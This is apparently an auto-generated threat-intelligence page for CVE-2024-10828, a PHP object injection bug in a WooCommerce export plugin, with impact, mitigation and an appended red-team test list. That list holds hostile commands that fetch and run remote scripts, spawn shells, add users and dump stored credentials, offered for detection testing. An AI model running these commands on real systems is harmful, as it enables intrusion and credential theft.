CVE-2024-10828
Overview
This vulnerability is a PHP Object Injection caused by unsafe deserialization of untrusted input within the Advanced Order Export For WooCommerce plugin. The flaw occurs specifically in the order export feature when the "Try to convert serialized values" option is enabled, allowing injection of crafted PHP objects. The affected component is the export functionality handling serialized data parsing in versions up to and including 3.5.5.
Vulnerability Description
The Advanced Order Export For WooCommerce plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.5.5 via deserialization of untrusted input during Order export when the "Try to convert serialized values" option is enabled. This makes it possible for unauthenticated attackers to inject a PHP Object. The additional presence of a POP chain allows attackers to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php).
Impact
An unauthenticated attacker can exploit this vulnerability remotely to inject PHP objects and delete arbitrary files on the server. This can lead to remote code execution if critical files like wp-config.php are deleted, potentially compromising the entire WordPress installation. The attack requires no authentication (PR:N) and no user interaction (UI:N), but the attack complexity is high (AC:H). The vulnerability impacts confidentiality, integrity, and availability (C:H/I:H/A:H) of the affected system, enabling full system compromise.
Solution
Users should upgrade the Advanced Order Export For WooCommerce plugin to a version later than 3.5.5 where this vulnerability is addressed. Detailed patch instructions and version updates are documented by Wordfence at https://www.wordfence.com/threat-intel/vulnerabilities/id/a1c6eed6-7b3f-4b37-85f8-6613527daa54. Disabling the "Try to convert serialized values" option can serve as a temporary mitigation until the plugin is updated.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability present in the Advanced Order Export For WooCommerce plugin for WordPress arises from a critical flaw in the handling of PHP object serialization. Specifically, the issue is rooted in the deserialization of untrusted input when the "Try to convert serialized values" option is enabled. This flaw allows an attacker to inject malicious PHP objects into the application, leading to a potential compromise of the server. The vulnerability is exacerbated by the existence of a Property-Oriented Programming (POP) chain, which can be exploited to perform arbitrary file deletions on the server. Such deletions could include sensitive files, such as the wp-config.php file, which contains critical configuration details and database credentials, thus paving the way for remote code execution.
Exploitation of this vulnerability can occur through various attack vectors, primarily targeting unauthenticated users. An attacker could craft a malicious payload that, when processed by the plugin during the order export process, triggers the deserialization flaw. By manipulating the serialized data, the attacker can execute a sequence of operations that leads to the execution of arbitrary code or the deletion of essential files. The simplicity of this attack vector, combined with the high likelihood of successful exploitation due to the lack of authentication requirements, makes it particularly dangerous. Attackers could leverage this vulnerability to gain full control over the affected WordPress instance, potentially leading to further compromises across the hosting environment.
The real-world impact of this vulnerability is profound, especially for businesses relying on WooCommerce for e-commerce operations. The potential for remote code execution means that an attacker could not only disrupt services but also access sensitive customer data, leading to data breaches and violations of privacy regulations. The financial implications can be severe, including loss of revenue during downtime, costs associated with incident response, and potential legal liabilities stemming from compromised customer information. Furthermore, the reputational damage incurred from such incidents can have long-lasting effects on customer trust and brand integrity.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. First, it is crucial to ensure that the Advanced Order Export For WooCommerce plugin is updated to the latest version, as this will include patches addressing the identified vulnerabilities. Regularly auditing and monitoring installed plugins for known vulnerabilities can help maintain a secure environment. Additionally, employing web application firewalls (WAFs) can provide an additional layer of protection by filtering out malicious requests that attempt to exploit this vulnerability. Organizations should also consider implementing strict input validation and sanitization practices to prevent untrusted data from being processed by the application.
In conclusion, the vulnerability in the Advanced Order Export For WooCommerce plugin represents a significant threat to WordPress sites utilizing this tool. The combination of unauthenticated access, the ability to inject malicious PHP objects, and the potential for remote code execution creates a high-risk scenario for businesses. By understanding the technical details, potential attack vectors, and implementing robust detection and mitigation strategies, organizations can better protect themselves against the ramifications of this vulnerability and maintain the integrity of their e-commerce operations.
The CVSS score for CVE-2024-10828 has been revised downward from 9.8 to 8.1 following a reassessment of the vulnerability’s exploitability and impact metrics. This adjustment reflects a more nuanced understanding of the attack complexity and the conditions required for successful exploitation, particularly the necessity for the vulnerable plugin’s “Try to convert serialized values” option to be enabled. CSURFACE threat intelligence confirms that, despite the high severity, the exploitability is somewhat constrained by these configuration dependencies, which reduces the overall risk profile. Our telemetry indicates that the exploit likelihood remains stable without any significant increase in active exploitation attempts or new proof-of-concept exploits emerging in the wild. While the vulnerability continues to pose a serious threat to affected WooCommerce installations, this recalibration signals a moderate reduction in immediate risk, allowing defenders to prioritize resources accordingly. The stable EPSS score further supports the assessment that exploitation activity is not accelerating, emphasizing the importance of ongoing vigilance but not indicating an imminent surge in attacks.
Update 2 — July 24, 2026
CSURFACE threat intelligence has detected a marked escalation in activity related to CVE-2024-10828, with new exploit attempts appearing after a period of dormancy. Our telemetry indicates that this resurgence is concentrated on environments where the vulnerable Advanced Order Export For WooCommerce plugin remains unpatched and the "Try to convert serialized values" option is enabled. Although no new proof-of-concept exploits have been publicly disclosed, the observed exploitation attempts suggest that threat actors are actively leveraging the PHP Object Injection vulnerability to achieve arbitrary file deletion, a critical step toward remote code execution. This development elevates the immediate threat level, signaling that attackers are increasingly targeting this vector, likely due to its high impact and ease of exploitation. Defenders should consider this uptick as a warning that the risk of compromise is rising, especially in unmitigated deployments, and that the window for exploitation is currently widening.
Affected Products (2)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Algolplus | Advanced Order Export For Woocommerce | All |
cpe:2.3:a:algolplus:advanced_order_export_for_woocommerce:*:*:*:*:free:wordpress:*:*
|
|
|
Algolplus | Advanced Order Export For Woocommerce | All |
cpe:2.3:a:algolplus:advanced_order_export_for_woocommerce:*:*:*:*:pro:wordpress:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
1 eventsSighting activity recorded
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-586 | Object Injection |
63%
|
Medium | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-10828 |
| wordfence.com |
GitHub CVE
|
https://www.wordfence.com/threat-intel/vulnerabilities/id/a1c6eed6-7b3f-4b37-85f8-6613527daa54?source=cve |
| plugins.trac.wordpress.org |
GitHub CVE
|
https://plugins.trac.wordpress.org/browser/woo-order-export-lite/trunk/classes/core/trait-woe-core-extractor.php#L996 |
| plugins.trac.wordpress.org |
GitHub CVE
|
https://plugins.trac.wordpress.org/browser/woo-order-export-lite/trunk/classes/PHPExcel/Shared/XMLWriter.php#L83 |